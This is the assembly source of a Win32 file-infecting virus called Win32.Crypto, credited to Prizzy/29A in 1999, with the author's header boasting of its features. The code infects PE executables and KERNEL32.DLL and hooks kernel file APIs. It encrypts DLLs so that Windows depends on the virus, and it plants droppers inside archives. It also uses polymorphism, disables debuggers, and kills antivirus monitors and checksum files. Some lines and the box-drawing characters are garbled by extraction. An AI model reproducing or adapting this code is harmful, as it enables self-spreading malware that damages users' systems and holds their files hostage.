


; 谀耐屯屯屯湍内哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目哪屯屯屯屯哪?; : Prizzy/29A : Win32.Crypto : Prizzy/29A :

; 滥耐屯屯屯湍睦哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁哪屯屯屯屯哪?;

; I'm very proud on my very first virus at Win32 platform. It infects EXE

; files with PE (Portable Executable) header. Also it can compress itself

; into ZIP/ARJ/RAR/ACE/CAB archivez. If the virus catch DLL opeations, it

; encrypt/decrypt that by cryptography functions. Thus, we can pronounce

; the system is dependents on the virus (OneHalf idea).


; When infected EXE is started, it infects KERNEL32.DLL, hooks some Win32

; functions and next reboot is actived. It catches "all" file operations,

; create thread/mutex, run Hyper Infection for API to find archivez, AV

; checksum files, EXEs and so on.


; If PHI-API will find an archive program, the virus compress itself and

; add itself to body (inside, not at the end). My PPE-II does NOT support

; copro & mmx garbages, only based with many features are new.



; Detailed Information

; 哪哪哪哪哪哪哪哪哪哪哪



; Cryptography Area, based on WinAPI (SR2/NT) functions

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?; Let us start. I exploited One Half technics for Win32 world, new method

; in our VX world. You exactly know One Half tries to encode your sectors

; and if you want to read its he decodes ones and so on, you exactly know

; what I think. Well, and because I use kernel32 infection I can hook all

; file functions. Then I decode all DLL files by PHI-II (Hyper Infection)

; and if the system wants to open DLL file I decode one, and so on. Then,

; the Win32 system is dependents on my virus. Naturally, the user can re-

; install Win95/98/NT/2000 but then DLL are in MSOffice, Visual C++, ICQ,

; Outlook, AutoCAD and many many more appz. For comparison: my Win98 has

; 831 DLL files and on my all disks are 5103 DLL files (including Win2k).

; I know this is the perfect way to get all what you want. But I've found

; out I can't hook all Win32 file operations so, true crypto DLL will be

; inside Ring0/Ring3 world - my future work...



; Prizzy Polymorphic Engine (PPE-II new version)

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

; I've removed all copro & mmx garbages and I've coded these new stuff:

; * brute-attack algorithm

; * random multi-layer engine

; By "brute-attack" I'm finding right code value by checksum. And because

; I don't know that number, AV neither. This process can take mostly 0.82

; seconds on my P233. For more info find "ppe_brute_init:" in this source


; In the second case I don't decode by default (up to down) but by random

; multi-layer algorithm. It means I generate the certain buffer and by

; its I decode up or down. Thus I can generate more then 950 layers and

; typical some 69 layers. Also the random buffer, behind poly loop, has

; anti-heuristic protection (gaps) to AV couldn't simulate that process.

; So, only in my decoding loop are stored the places where the gaps are.

; Find "ppe_mlayer_generate:" label for many momre information.



; Infection ZIP/ARJ/RAR/ACE/CAB archivez, including RAR/ACE EXE-SFX

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?; I will find these archive programs and by them I will compress some in-

; fected file by random compression level. Then the dropper is stored in-

; side archive, not at the end. So, I don't need have any CRC algorithms.

; However these operations are very complex, especially ZIP infection but

; it isn't impossible. So, AV cannot check only last file (stored) in ar-

; chive, but inside it.



; Main features

; 哪哪哪哪哪哪哪?;


; * Platforms: Windows 95/98, Windows NT/2000 (tested on 2031 build)

; * Residency: Yes, KERNEL32 way, working on 95/98 and NT/2k systems

; * Non-residency: Yes, only K32 infection

; * Stealth: Yes, DLLs working; opening, copying and loading

; * AntiDebugging: Yes, some stupid debuggers like TD32; routinues for

; disable SoftICE 95/NT.

; * AntiHeuristic: Yes, threads way and multi-layer anti-heuristic

; * AntiAntivirus: Yes, deleting checksum files, hacking AVAST database

; * Other anti-*: Yes, anti-emulator, anti-bait, anti-monitor

; * Fast Infection: Yes/No, infect only 20 EXEs every reboot, but infect

; all types of archivez on all diskz

; * Polymomrphism: Yes, using based garbages from Win9x.Prizzy, inclu-

; ding brute-force way and random multi-layer way

; * Other features: (a) Use of brute-CRC64 algorithm to find APIs in K32

; (b) Encoding and decoding DLLs in real time

; (c) Memory allocations by "CreateFileMapping" func.

; 'cause of sharing among processes

; (d) Use of threads, mutexes & process tricks

; (e) Support of "do not infected" table

; (f) Checking files by natural logarithm

; (g) No optimalization, yeah, I don't lie (read

; "Words from Prizzy" 29A #4 to know why)

; (h) UniCode support



; Greetings

; 哪哪哪哪哪?;

; And finally my greetz go to:

; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪

; Darkman u're really great inet pal, thanx for fun on #virus :)

; Benny thanx for big help with threads, mutexes... we're wait-

; ing for Darkman's trip here, aren't we :) ?

; GriYo nah, I'd like to understand your ideas... thanx :) !

; Flush u've really big anti-* ideas, dude

; MemoryLapse yeah, K32 infection... go out of efnet to undernet

; LordJulus you have great vx articles, viruses ...

; Asmodeus finish that virus and release it; thanx for your trust

; AV companies just where is my win9x.prizzy description :) ?

; ...and for VirusBuster and Bumblebee



; Contact me

; 哪哪哪哪哪

; [email protected]

; http://prizzy.cjb.net



; (c)oded by Prizzy/29A, December 1999




.model flat,STDCALL

include Include/Win32API.inc

include Include/UseFul.inc

include Include/MZ.inc

include Include/PE.inc

extrn ExitProcess:proc

extrn MessageBoxA:proc

;哪拇 prepare to program start 媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?


db ?


;哪拇 some equ's needed by virus 媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?

;DEBUG equ YEZ ;only for debug and 1st start

mem_size equ (mem_end -virus_start) ;size of virus in memory

file_size equ (file_end-virus_start) ;size of virus in file

infect_minsize equ 4096 ;only filez bigger then 4K

infect_maxsize equ 100*1024*1024 ;to 100Mb

access_ebx equ (dword ptr 16) ;access into stack when

access_edx equ (dword ptr 20) ;will be used pushad

access_ecx equ (dword ptr 24)

access_eax equ (dword ptr 28)

search_mem_size equ 100*(size dta+size search_address)

;哪拇 some structurez for virus 媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

dta_struc struc ;Win32_FIND_DATA structure

dta_fileattr dd ? ;for FindFirstFile function

dta_time_creation dq ?

dta_time_lastaccess dq ?

dta_time_lastwrite dq ?

dta_filesize_hi dd ?

dta_filesize dd ?

dta_reserved_0 dd ?

dta_reserved_1 dd ?

dta_filename db 260 dup (?)

dta_filename_short db 14 dup (?)


sysTime_struc struc ;used by my Windows API

wYear dw 0000h ;"hyper infection"

wMonth dw 0000h

wDayOfWeek dw 0000h

wDay dw 0000h

wHour dw 0000h

wMinute dw 0000h

wSecond dw 0000h

wMilliseconds dw 0000h


Process_Information struc ;CreateProcess: struc #1

hProcess dd 00000000h

hThread dd 00000000h

dwProcessId dd 00000000h

dwThreadId dd 00000000h


Startup_Info struc ;CreateProcess: struc #2

cb dd 00000000h

lpReserved dd 00000000h ;this struc has been stolen

lpDesktop dd 00000000h ;from "Win32 Help"

lpTitle dd 00000000h

dwX dd 00000000h

dwY dd 00000000h

dwXSize dd 00000000h

dwYSize dd 00000000h

dwXCountChars dd 00000000h

dwYCountChars dd 00000000h

dwFillAttribute dd 00000000h

dwFlags dd 00000000h

wShowWindow dw 0000h

cbReserved2 dw 0000h

lpReserved2 dd 00000000h

hStdInput dd 00000000h

hStdOutput dd 00000000h

hStdError dd 00000000h


File_Time struc ;get/set file time struc

dwLowDateTime dd 00000000h

dwHighDateTime dd 00000000h


;哪拇 some macroz needed by virus 媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪

; search "anti-emulators:" for more information

@ANTI_E_START macro start_hack, finish_hack

WHILE (num NE 0)

push dword ptr [ebp+start_hack + /

((finish_hack-start_hack) / 4 + 1 - num) * 4]

num = num - 1


num = (finish_hack - start_hack) / 4 + 1


@ANTI_E_FINISH macro start_hack, finish_hack, thread_handle

WHILE (num NE 0)

pop dword ptr [ebp+finish_hack - /

(finish_hack-start_hack) mod 4 - /

((finish_hack-start_hack) / 4 + 1 - num) * 4]

num = num - 1


call [ebp+ddCloseHandle], thread_handle

num = (finish_hack - start_hack) / 4 + 1


;哪拇 virus code starts here 媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?virus_start:

call get_base_ebp ;get actual address to EBP

mov eax,ebp

db 2Dh ;sub eax,infected_ep

infected_ep: dd 00001000h

db 05h ;add eax,original_ep

original_ep: dd 00000000

sub eax,[ebp+__pllg_lsize]

push eax ;host address

; use anti-emulator


@SEH_SetupFrame <jmp __anti_e_1>;set SEH handler

call $ ;ehm :)

jmp __return


@SEH_RemoveFrame ;reset SEH handler


call find_kernel32 ;find kernel's base address

; use anti-emulator

@ANTI_E_START __thread_1_begin, __thread_1_finish

lea eax,[ebp+__thread_1] ;thread function

mov ebx,offset __thread_1_begin + /

(__thread_1_finish - __thread_1_begin) /

shl 18h ;upper imm8 register in EBX

call __MyCreateThread ; * anti-heuristic

__thread_1_begin equ this byte

jmp $ ;anti-emulator :)

jmp __return ;patch this ! random number

__thread_1_finish equ this byte

@ANTI_E_FINISH __thread_1_begin, __thread_1_finish, eax

; next code...

call kill_av_monitors ;kill AVP, AVAST32 etc.

call kill_debuggers ;bye, bye SoftICE, my honey

call create_mutex ;already resident ?

jc __return ;go back, if yes

call crypto_startup

call infect_kernel ;ehm, find kernel and infect!


pop eax

add eax,offset virus_start

jmp eax ;go back, my lord...

;哪拇 main function for infect file 媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪


;This is main function which infects file.


;Extension support:

; EXE ... executable file (PE), RAR/ACE SFX file

; DLL ... kernel32 infection, encypting through PHI-API

; CAB ... infecting Microsoft Cabinet File

; ZIP/ARJ/RAR/ACE ... dropper compressed,inside archive


;Okay, here is truth. I had many problems with EXE and DLL

;infection in this function. I found out all valuez have

;to be aligned etc. Especially Win2k need that. I also use

;"CheckSumMappedFile" function to calculate appz checksum.



; save registers & get delta


call get_base_ebp

; get extension

mov edi,[ebp+filename_ptr]

; convert lowercase characters to uppercase

push edi

call [ebp+ddlstrlen] ;get length of filename

inc eax ;number of characters to

push eax ;progress

push edi ;filename

call [ebp+ddCharUpperBuffA] ;convert to uppercase

; infect only files in these dirz


cmp [edi+00000000h],'W/:C' ;"C:/WIN/WEWB4/XX/"

jnz __if_debug ;directory

cmp [edi+00000004h],'W/NI'

jnz __if_debug

cmp [edi+00000008h],'4BWE'

jnz __if_debug

cmp [edi+0000000Ch],'/XX/'

jz __if_debug2


cmp [edi],'W/:C' ;"C:/WINDOWS/KERN"

jnz infect_file_exit

cmp [edi+4],'ODNI'

jnz infect_file_exit

cmp [edi+8],'K/SW'

jnz infect_file_exit

cmp [edi+8+4],'ENRE'

jnz infect_file_exit



; check file name (by avoid table)

mov ebx,[ebp+filename_ptr] ;filename

lea esi,[ebp+avoid_table] ;avoid table

call validate_name

jc infect_file_exit

; check AV files (anti-bait)

call fuck_av_files

jc infect_file_exit

; get extension


mov al,'.' ;search this char

mov cx,filename_size ;max filename_size

repnz scasb ;searching...

dec edi ;set to that char

cmp al,[edi] ;check again !

jnz infect_file_exit ;shit, bad last char


mov eax,[edi-4] ;you can infect only

cmp eax,'23LE'

jz __OnlyMyKernel

cmp eax,'DCBA' ;this file on my disk

jnz infect_file_exit ;i won't risk



; get file information

lea esi,[ebp+dta] ;dta structure

mov edx,[ebp+filename_ptr] ;FileName pointer

call __MyFindFirst

jc infect_file_exit ;success ?

call __MyFindClose ;close handle

cmp dword ptr [ebp+it_is_kernel],00000001h

jz infect_file_continue ;if kernel32, infect it

; check extension

mov eax,[edi] ;get ext of file

not eax

cmp eax,not 'EXE.' ;is it EXE file ?

jnz next_ext_1

call infect_ACE_RAR ;is it ACE/RAR EXE-SFX file ?

jnc infect_file_exit

jmp next_ext_end


cmp eax,not 'ECA.' ;is it ACE archive file ?

jnz next_ext_2

call infect_ACE


cmp eax,not 'RAR.' ;is it RAR archive file ?

jnz next_ext_3

call infect_RAR


cmp eax,not 'JRA.' ;is it ARJ archive file ?

jnz next_ext_4

call infect_ARJ


cmp eax,not 'PIZ.' ;is it ZIP archive file ?

jnz next_ext_5

call infect_ZIP


cmp eax,not 'BAC.' ;is it CAB archive file ?

jnz infect_file_exit

call infect_CAB

jmp infect_file_exit

next_ext_end: ;infect if any EXE file

; check number of infected files

cmp [ebp+NewACE.dropper],00000000h

jz infect_file_continue ;dropper exists ?

cmp dword ptr [ebp+file_infected],20

jae infect_file_exit ;infected more then 20 EXEs ?

; check file size


mov eax,[ebp+dta.dta_filesize]

cmp eax,infect_minsize ;is filesize smaller ?

jb infect_file_exit

cmp eax,infect_maxsize ;is filesize bigger ?

ja infect_file_exit

; set file attributes


mov edx,[ebp+filename_ptr]

call __MySetAttrFile

jc infect_file_exit ;success ?

; open file

mov edx,[ebp+filename_ptr]

call __MyOpenFile ;open file !

jc infect_file_restattr

mov [ebp+file_handle],eax

; create a memory map object

push 00000000h ;name of file mapping object

push 00000000h ;low 32 bits of object size

push 00000000h ;high 32 bits of object size

push PAGE_READONLY ;get needed valuez, etc.

push 00000000h ;optional security attributes

push [ebp+file_handle] ;handle to file to map

call [ebp+ddCreateFileMappingA]

or eax,eax ;failed ?

jz infect_file_close

mov [ebp+file_hmap],eax ;store mapped file handle

; view of file in our address

push 00000000h ;number of bytes to map

push 00000000h ;low 32 bits of the offset

push 00000000h ;high 32 bits of the offset

push FILE_MAP_READ ;access mode

push [ebp+file_hmap] ;mapped file handle

call [ebp+ddMapViewOfFile]

or eax,eax ;failed ?

jz infect_file_closeMap

mov [ebp+file_hmem],eax ;mapped file in memory

; check file signature

cmp word ptr [eax.MZ_magic], /


jnz infect_file_unMap

; check "PE" valuez

cmp word ptr [eax.MZ_crlc],0000h

jz infect_file_okay ;no PE ?

cmp word ptr [eax.MZ_lfarlc],0040h

jb infect_file_unMap ;bad PE ?


; seek on NT header

mov esi,eax

add esi,[eax.MZ_lfanew]

push esi

call [ebp+ddIsBadCodePtr] ;can we read memory at least?

or eax,eax

jnz infect_file_unMap

; check "PE" signature

cmp dword ptr [esi.NT_Signature], /


jnz infect_file_unMap ;is it really 'PE/0/0' ?

; already infected ?

mov eax,[ebp+file_hmem] ;mapped file in memory

add eax,[ebp+dta.dta_filesize]

mov eax,[eax-00000004h] ;infected dword flag

call __check_infected

jnc infect_file_unMap

; check header flags

mov ax,[esi+NT_FileHeader.FH_Characteristics]


jz infect_file_unMap

test ax,IMAGE_FILE_DLL ;no DLL ?

jz infect_file_no_dll

cmp dword ptr [ebp+it_is_kernel],00000000h

jz infect_file_unMap ;is it kernel32 infection ?


call __getLastObjectTable ;seek on last object table

; alloc memory for polymorphic engine

mov eax,file_size + 30000h

call malloc

mov [ebp+mem_address],eax

add eax,file_size

mov [ebp+poly_start],eax

; get new entry-point (EXE), or change IT of kernel32 ?

mov eax,[ebx+SH_SizeOfRawData]

add eax,[ebx+SH_VirtualAddress]

mov dword ptr [ebp+infected_ep],eax

mov eax,[esi+NT_OptionalHeader.OH_AddressOfEntryPoint]

mov dword ptr [ebp+original_ep],eax

mov [ebp+poly_finish],mem_size

; run Prizzy Polymorphic Engine (PPE-II)

cmp dword ptr [ebp+it_is_kernel],00000000h

jnz infect_file_common

call ppe_startup

; calculate maximum infected file size


mov eax,[ebx+SH_SizeOfRawData] ;file size

add eax,[ebx+SH_PointerToRawData]

add eax,[ebp+poly_finish] ; + virus file size

add eax,00000004h ; + infected flag

mov ecx,[esi+NT_OptionalHeader.OH_FileAlignment]

xor edx,edx

add eax,ecx

dec eax

div ecx

mul ecx

push eax

; unmap file object

push [ebp+file_hmem]

call [ebp+ddUnmapViewOfFile]

; close mapping file object

push [ebp+file_hmap]

call [ebp+ddCloseHandle]

; reopen memory mapped file object

push 00000000h ;name of file mapping object

push dword ptr [esp+0000004h];low 32 bits of object size

push 00000000h ;high 32 bits of object size

push PAGE_READWRITE ;get needed valuez, etc.

push 00000000h ;optional security attributes

push [ebp+file_handle] ;handle to file to map

call [ebp+ddCreateFileMappingA]

mov [ebp+file_hmap],eax ;store mapped file handle

; view of file in our memory

push 00000000h ;number of bytes to map

push 00000000h ;low 32 bits of the offset

push 00000000h ;high 32 bits of the offset

push FILE_MAP_WRITE ;access mode

push [ebp+file_hmap] ;mapped file handle

call [ebp+ddMapViewOfFile]

mov [ebp+file_hmem],eax ;mapped file in memory

; seek on last object table

add eax,[eax.MZ_lfanew]

mov esi,eax

call __getLastObjectTable

; infect "KERNEL32" file OR change EntryPoint

cmp dword ptr [ebp+it_is_kernel],00000000h

jz infect_file_entry

mov [ebp+__pllg_lsize],00000000h ;more info in that func

call infect_file_kernel ;hook "kernel32" table :)

jmp infect_file_no_change


mov eax,dword ptr [ebp+infected_ep]

add eax,[ebp+file_size3]

mov [esi+NT_OptionalHeader.OH_AddressOfEntryPoint],eax

; copy mem_address (virus body) to the end of file


push esi

mov esi,[ebp+mem_address] ;source data

mov edi,[ebx+SH_SizeOfRawData]

add edi,[ebx+SH_PointerToRawData]

add edi,[ebp+file_hmem] ;destination pointer

mov ecx,[ebp+poly_finish] ;number of bytes to copy

rep movsb

pop esi

; calculate new physical size

mov eax,[ebp+poly_finish]

cmp dword ptr [ebp+it_is_kernel],00000000h

jz $ + 7 ;this isn't logic but i had

mov eax,mem_size ;problems in k32 memory

add eax,[ebx+SH_SizeOfRawData]

mov ecx,[esi+NT_OptionalHeader.OH_FileAlignment]

xor edx,edx

add eax,ecx

dec eax

div ecx

mul ecx

mov [ebx+SH_SizeOfRawData],eax

; calculate new potential virtual size

mov eax,[ebx+SH_VirtualSize]

add eax,mem_size

mov ecx,[esi+NT_OptionalHeader.OH_SectionAlignment]

xor edx,edx

add eax,ecx

dec eax

div ecx

mul ecx

; if new phys_size > virt_size ==> virt_size = phys_size

cmp eax,[ebx+SH_SizeOfRawData]

jnc infect_file_no_update

mov eax,[ebx+SH_SizeOfRawData]


mov [ebx+SH_VirtualSize],eax

add eax,[ebx+SH_VirtualAddress]

; infected host increased an image size ?

cmp eax,[esi+NT_OptionalHeader.OH_SizeOfImage]

jc infect_no_update_2

mov [esi+NT_OptionalHeader.OH_SizeOfImage],eax


; set these PE flags

or dword ptr [ebx+SH_Characteristics], /



; already infected flag

mov eax,02302301h ;special number

call ppe_get_rnd_range

inc eax ;it can't be zero

imul eax,117 ;encrypt one

pop edi ;file size + virus size

mov [ebp+file_hsize],edi

add edi,[ebp+file_hmem] ;mapped file in memory

mov [edi-00000004h],eax ;already infected flag

; calculate new checksum because of Win2k and WinNT :)

cmp dword ptr [esi+NT_OptionalHeader. /


jz infect_file_no_checksum

@pushsz "IMAGEHLP.DLL" ;load "IMAGEHLP.DLL" library

call [ebp+ddLoadLibraryA]

or eax,eax ;failed ?

jz infect_file_no_checksum

push eax ;parameter for FreeLibrary

; get function to calculate checksum

@pushsz "CheckSumMappedFile" ;get address of this function

push eax ;library handle

call [ebp+ddGetProcAddress]

or eax,eax

jz infect_file_deload

; calculate checksum

lea ecx,[esi+NT_OptionalHeader.OH_CheckSum]

push ecx ;receives computed checksum

call $+9 ;header old checksum

dd ?

push dword ptr [ebp+file_hsize]

push [ebp+file_hmem] ;memory mapped address

call eax


call [ebp+ddFreeLibrary]

; dealloc memory for PPE-II


mov eax,[ebp+mem_address]

call mdealloc

; new infected file

inc dword ptr [ebp+file_infected]

; use for acrhive dropper ?

cmp dword ptr [ebp+dta.dta_filesize],30000

ja infect_file_unMap ;for archive fsize < 30Kb

push [ebp+file_hmem] ;mapped file in memory

call [ebp+ddUnmapViewOfFile]

push [ebp+file_hmap] ;mapped file object

call [ebp+ddCloseHandle]

mov ebx,[ebp+file_handle] ;I must close infected file

call __MyCloseFile ;coz I'll copy it, etcetera

call __add_dropper ;compress it by ZIP, RAR ...

jmp infect_file_restattr


push [ebp+file_hmem] ;mapped file in memory

call [ebp+ddUnmapViewOfFile]


push [ebp+file_hmap] ;mapped file object

call [ebp+ddCloseHandle]


lea eax,[ebp+dta.dta_time_lastwrite]

lea ecx,[ebp+dta.dta_time_lastaccess]

lea edx,[ebp+dta.dta_time_creation]

call [ebp+ddSetFileTime], /

[ebp+file_handle], /

edx, ecx, eax


mov ebx,[ebp+file_handle] ;close file handle

call __MyCloseFile


mov ecx,[ebp+dta.dta_fileattr]

mov edx,[ebp+filename_ptr] ;restore file attributes

call __MySetAttrFile


popa ;go to HyperInfection or to

ret ;Kernel32 hooked functions


;Common file infected semi-functions.



movzx eax,[esi+NT_FileHeader.FH_NumberOfSections]



dec eax

mul ecx ;eax=offs of last section

movzx edx,[esi+NT_FileHeader.FH_SizeOfOptionalHeader]

add eax,edx

add eax,esi

add eax,offset NT_OptionalHeader.OH_Magic ;seek to l.o. table

xchg eax,ebx


;哪拇 function to hook some funtions from KERNEL32.DLL 媚哪哪哪哪哪哪哪哪?


;At last I've finished this unpalatable function. I remem-

;ber how hardly I have found an interesting source about

;this method because I have many many problems with this.

;So, let's begin. At first I will get these addresses:

; * name table pointer (as are function names)

; * address table pointer (as are functions addresses)

; * ordinal table pointer

;Then I'll get function name, calculate its CRC32 and I'll

;compare it with my future-hooked CRC32 table. If I will

;find it, i will save its original address, replace by my

;my new offset and I'll write it to the file.


;I would like to thank:

; * "Memory Lapse" for his "Win32.Heretic" source

; * Darkman/29A for giving me that source


;I must infect "kernel32.dll" because I must hook all disk

;functions because of "Prizzy Hyper Infection for API".



; save all registers


; check address of APIs in KERNEL32 file body

mov eax,[ebp+file_hmem]

add eax,[eax.MZ_lfanew] ;go to new "PE" header

mov eax,dword ptr [eax.OH_DirectoryEntries + /


00000004h] ;get Export Directory Table

add eax,[ebp+file_hmem]

mov ebx,[eax.ED_AddressOfOrdinals]

mov esi,[eax.ED_AddressOfNames]

mov edx,[eax.ED_AddressOfFunctions]

push [eax.ED_BaseOrdinal] ;save BaseOrdinal

add eax,[eax.ED_BaseOrdinal]

add ebx,[ebp+file_hmem] ;adjust ordinal table pointer

add esi,[ebp+file_hmem] ;adjust name table pointer

add edx,[ebp+file_hmem] ;adjust address table pointer

push edx esi ebx ;save startup values

; main loop

lea edi,[ebp+Hooked_API]

mov ecx,00000001h


push edx ;address table pointer

push ecx ;save counter

shl ecx,01h ;convert to word index

movzx eax,word ptr [ebx+ecx] ;calculate ordinal index

sub eax,[esp+00000014h] ;relative to ordinal basee

shl eax,02h ;convert to dword index

mov edx,eax

mov ecx,[esp+00000010h] ;address pointer table

add eax,ecx ;calculate offset

lea ecx,[ecx+edx] ;RVA of API

push esi ;address name table

mov esi,[esi] ;get pointer from name table

add esi,[ebp+file_hmem]

call __get_CRC32 ;get CRC32 for function name

cmp eax,[edi] ;compare CRC32

pop esi

jnz __ifk_not_found

push edi ;load original function addr

lea eax,[ebp+Hooked_API]

sub edi,eax

shl edi,01h ;so, (x/2)*8

lea eax,[ebp+Hooked_API_functions]

add edi,eax

mov eax,[edi] ;get address into "jmp ????"

add eax,ebp ;ehm, adjust that address

mov ebx,[ecx] ;load original address

add ebx,[ebp+kernel_base]

mov [eax],ebx ;save original func. address

mov eax,[edi+00000004h] ;load new address in v.body

pop edi

add edi,00000004h ;next CRC32 function value

sub eax,offset virus_start ; - "offset"

add eax,[ebp+dta.dta_filesize] ;new func. pos in "k32"

mov [ecx],eax

; for next loop I must restart these values

mov ebx,[esp+00000008h] ;load ordinal table pointer

mov esi,[esp+0000000Ch] ;load name table pointer

mov edx,[esp+00000010h] ;load address table pointer

mov dword ptr [esp],00000000h ;reset counter

mov [esp+00000004h],edx ;reset address table pointer

jmp __ifk_no_change ;this was fucking bug !


add esi,00000004h ;next name pointer

add dword ptr [esp + / ;next function pointer



pop ecx ;functions counter

inc ecx ;next function

pop edx ;address table pointer

cmp dword ptr [edi],00000000h ;end of hooked functions ?

jnz __ifk_next_loop

mov dword ptr [ebp+it_is_kernel],00000000h

mov dword ptr [ebp+HyperInfection_k32],00000000h

; write this virus body to the end of "kernel32.dll"

; virus body cannot be encrypted...

lea esi,[ebp+virus_start] ;start of virus body

mov edi,[ebp+mem_address] ;allocated memory

mov ecx,mem_size

rep movsb

mov dword ptr [ebp+it_is_kernel],00000001h

mov eax,mem_size ;without poly-engine !!!

mov [ebp+poly_finish],eax

add esp,4*4


ret ;complex way how to go back

;哪拇 main function of infect all filez on disks 媚哪哪哪哪哪哪哪哪哪哪哪?


;This function searchs these extensions on all disks:


;and many namez, find "HyperTable" struct for more info.

;If you want to know more about this method, open "Hyper

;Infection" article in 29A #4, or download one from my web


;Note: * This is version for API, for IDT orientation use

; code from "Win95.Prizzy", thanks.




call get_base_ebp ;where we're into ebp

mov ebx,[ebp+search_table] ;position in HyperTable

cmp byte ptr [ebp+search_start],00h

jnz __continue

mov byte ptr [ebp+search_start],01h

call get_disks ;get drive parameters

lea eax,[ebp+time]

push eax

call [ebp+ddGetSystemTime] ;get actual time

mov eax,search_mem_size ;size of mem for searching

call malloc

jz init_search_error ;were we sucessful ?

mov [ebp+search_address],eax

mov eax,005C3A43h ;'C://0'

mov dword ptr [ebp+search_filename],eax


mov byte ptr [ebp+search_plunge],00h

jmp search_all_dirs


cmp byte ptr [ebp+search_filename],'Z'

jz init_search_done

inc byte ptr [ebp+search_filename]

mov word ptr [ebp+search_filename+2],005Ch

; what disk is it ? fixed ? cd-rom ? ram-disk ? etc. ?

mov cl,'A'

sub cl,[ebp+search_filename]

neg cl

mov eax,00000001h

shl eax,cl ;convert to BCD

test [ebp+gdt_flags],eax

jnz __searching ;may I "use" this disk ?

jmp __searching_end ;uaaaaah, i'm crazy... :)


mov ecx,dword ptr [ebp+search_address]

call mdealloc ;deallocate memory


popa ;restore all regz


init_search_done: ;all disks infected?

call hookHyperInfection_Done ;remove timer

jmp init_search_exit


lea ebx,[ebp+HyperTable]


call __add_filename ;add filename or extension

call __calc_in_mem ;offs dta in mem to esi

lea edx,[ebp+search_filename]

call __MyFindFirst

mov [esi-size search_handle],eax ;save handle

jc __find_dir ;error ?


call __clean ;delete extension

push esi

lea esi,[esi].dta_filename ;and add file name

@copysz ;copy with zero char

pop esi ;restore esi=dta in memory

lea eax,[ebp+search_filename]

mov [ebp+filename_ptr],eax




; int 4 ;final SoftICE breakpoint

mov eax,[ebx-00000004h] ;input value

push dword ptr [ebx-00000008h]

add [esp],ebp ;this was ghastly bug !

call [esp] ;call function

pop eax

push word ptr [ebp+time.wSecond]

lea eax,[ebp+time] ;give time other appz

push eax

call [ebp+ddGetSystemTime]

pop cx

mov [ebp+search_table],ebx ;position in HyperTable

cmp cx,[ebp+time.wSecond] ;out of time ?

jnz init_search_error


call __calc_in_mem ;esi=dta in memory

mov eax,[esi-size search_handle] ;handle of FindFirstFile

call __MyFindNext

jnc __repeat

call __MyFindClose


call __clean ;remove file name/extension

cmp byte ptr [ebx],0FFh ;last file name ?

jnz search_all_dirs_continue


mov [edi],002A2E2Ah ;add '*.*',0

call __calc_in_mem

lea edx,[ebp+search_filename]

call __MyFindFirst ;search directory "only"

mov [esi-size search_handle],eax

jc __search_exit


test [esi].dta_fileattr,10h ;is it directory ?

jz __find_next

cmp [esi].dta_filename,'.' ;it can't be directory

jz __find_next

inc byte ptr [ebp+search_plunge]

call __get_last_char ;edi=last char of filename

lea esi,[esi].dta_filename ;esi=filename

call __clean ;remove extension

@copysz ;copy directory name and

mov word ptr [edi-1],005Ch ;set '/' at the end

jmp search_all_dirs ;search in new directory


call __calc_in_mem

mov eax,[esi-size search_handle]

call __MyFindNext

jnc __find_in_dir


call __clean ;remove file name and '/'

mov byte ptr [edi-1],00h ;it's out of directory

dec byte ptr [ebp+search_plunge]

cmp byte ptr [ebp+search_filename+2],00h

jz __searching_end

jmp __find_next

__calc_in_mem: ;get pointer to dta in memory

movzx esi,byte ptr [ebp+search_plunge]

imul esi,size dta+size search_handle

add esi,[ebp+search_address]

add esi,size search_handle


__add_filename: ;add f.n. or ext by HyperTable

call __get_last_char

cmp byte ptr [ebx],00h ;only extension ?

jnz __af_fullcopy

mov eax,[ebx+1] ;load extension

mov byte ptr [edi],2Ah ;'*'

mov [edi+1],eax ;and extension

mov byte ptr [edi+5],00h ;zero byte

add ebx,HyperTable_OneSize

cmp byte ptr [ebx - /

HyperTable_HalfSize],00h;search this extension ?

jz __aff_finish

pop eax

jmp __find_dir




inc ebx

mov al,byte ptr [ebx] ;load filename's char

mov [edi],al

inc edi

or al,al ;end of filename ?

jnz __af_fullcopy

add ebx,HyperTable_HalfSize+1;+1 means zero byte

cmp byte ptr [ebx - /

HyperTable_HalfSize],00h;search this filename ?

jz __aff_finish

pop eax

jmp __find_dir

__get_last_char: ;edi=last char+1 in filename

lea edi,[ebp+search_filename]

mov ecx,filename_size

xor al,al


repnz scasb

dec edi


__clean: ;clean last item in filename

lea edx,[ebp+search_filename]

call __get_last_char

__2:mov byte ptr [edi],0

dec edi

cmp byte ptr [edi],'/'

jnz __2

inc edi


;哪拇 infection in ACE/RAR and ACE/RAR EXE-SFX archivez 媚哪哪哪哪哪哪哪哪


;This function scans input EXE file whether it is not SFX

;for RAR (Dos,W32) or for ACE (Dos,Win32 - German/English)

;If yes, I will put compressed dropper in the end of file.

;Why that ? See on "infect_ACE:" comment for more info.


__iSFX_fHandle dd 00000000h ;file's handle

__iSFX_fMemory dd 00000000h ;file's headers

__iSFX_nCompare dd 00000000h ;comparing places



; open input file

mov edx,[ebp+filename_ptr]

call __MyOpenFile

jc __iSFX_finish

mov [ebp+__iSFX_fHandle],eax

; allocate memory for comparing

mov eax,10000h

call malloc

mov [ebp+__iSFX_fMemory],eax

; we must search certain bytes on certain file position

mov [ebp+__iSFX_nCompare],7 ;six! comparing


dec [ebp+__iSFX_nCompare]

jz __iSFX_sEnd

lea ebx,[ebp+Archive_MagicWhere]


mov eax,[ebp+__iSFX_nCompare]

imul eax,00000004h

add ebx,eax

